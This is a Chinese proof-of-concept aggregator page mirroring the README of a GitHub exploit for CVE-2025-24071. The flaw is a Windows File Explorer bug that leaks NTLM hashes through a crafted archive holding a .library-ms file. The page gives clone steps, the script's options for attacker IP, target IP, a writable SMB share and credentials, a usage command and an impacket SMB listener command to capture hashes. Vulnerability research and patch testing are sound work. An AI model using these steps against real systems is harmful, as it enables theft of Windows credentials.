POC详情: 6dda0eab8a5ea63fe8473471dabe6e6ad55d4056

来源
关联漏洞
标题: Microsoft Windows File Explorer 信息泄露漏洞 (CVE-2025-24071)
描述:Microsoft Windows File Explorer是美国微软(Microsoft)公司的一个文件管理器应用程序。 Microsoft Windows File Explorer存在信息泄露漏洞。攻击者利用该漏洞可以获取敏感信息。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows Server 2019,Windows Server
描述
Windows File Explorer Spoofing Vulnerability - CVE-2025-24071
介绍
# CVE-2025-24071
Windows File Explorer Spoofing Vulnerability - CVE-2025-24071

Leak the NTLM hash of Windows through the extraction of a manipulated ZIP or RAR file, and by exploiting a vulnerability in the handling of .library-ms files (a type of file used by Windows to specify libraries and network connections).

## Affected version
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows Server 2025 (Server Core installation)
Windows Server 2025
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 11 Version 24H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019

## Instalation:

```bash
git clone https://github.com/f4dee-backup/CVE-2025-24071
```

```bash
cd CVE-2025-24071
```
```bash
chmod +x CVE-2025-24071.sh
```
## Help Panel:
```
./CVE-2025-24071.sh -h
	-i) Your IP address
	-t) Target IP
	-d) A remote SMB share with write permissions (e.g.) C, ADMIN, IPC, SYSVOL, etc) 
	-u) Username
	-p) Password
	-h) Display this help panel
```
## Usage:
```bash
./CVE-2025-24071.sh -i "YOUR_IP" -t "TARGET_IP" -d "DIRECTORY_WRITE_REMOTE" -u "USER" -p "PASSWORD"
```

## Start the SMB server:
```bash
impacket-smbserver smbFolder $(pwd) -smb2support
```
文件快照

[4.0K] /data/pocs/6dda0eab8a5ea63fe8473471dabe6e6ad55d4056 ├── [4.4K] CVE-2025-24071.sh ├── [1.0K] LICENSE ├── [2.1K] README.md └── [ 31] requirements.txt 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。